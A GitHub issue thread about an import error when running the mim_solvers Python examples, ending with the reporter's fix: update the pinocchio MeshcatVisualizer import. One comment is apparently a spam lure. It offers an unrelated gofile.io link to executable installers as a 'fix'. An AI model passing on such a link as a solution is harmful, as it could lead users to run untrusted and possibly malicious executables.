### ISSUE TITLE
Running Python Examples Error

### ISSUE THREAD

**Issue by RX-00** [machines-in-motion/mim_solvers#37]
Hello,

I have installed mim-solvers via `pip install cmeel-mim-solvers`. However, when I try to run any of the examples I am met with this error:
```
Traceback (most recent call last):
  File "/home/roy/mim_solvers/examples/solo12.py", line 18, in <module>
    import mim_solvers
  File "/home/roy/.local/lib/python3.10/site-packages/cmeel.prefix/lib/python3.10/site-packages/mim_solvers/__init__.py", line 9, in <module>
    from .mim_solvers_pywrap import * #noqa
RuntimeError: extension class wrapper for base class crocoddyl::SolverAbstract has not been created yet
```
I have installed crocoddyl through robotpkg and tried another environment in which I installed it via pip , so I am unsure as to what I'm missing here. Any thoughts on what went wrong?

Thanks!

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by RX-00** [comment]
Unfortunately, I'm on an Ubuntu 22.04 machine so I can't really run those executables. Thank you though.

**Comment by RX-00** [comment]
Here's the solution to this issue:

The mim-solvers repo’s example scripts are out of date with current uses of meshcat and pinocchio. To resolve this you must add the following import:
```
from pinocchio.visualize import MeshcatVisualizer
```
Then change the line
```
viz = pin.visualize.MeshcatVisualizer(robot.model, ...
```
to
```
viz = MeshcatVisualizer(robot.model, robot.collision_model, robot.visual_model)
```
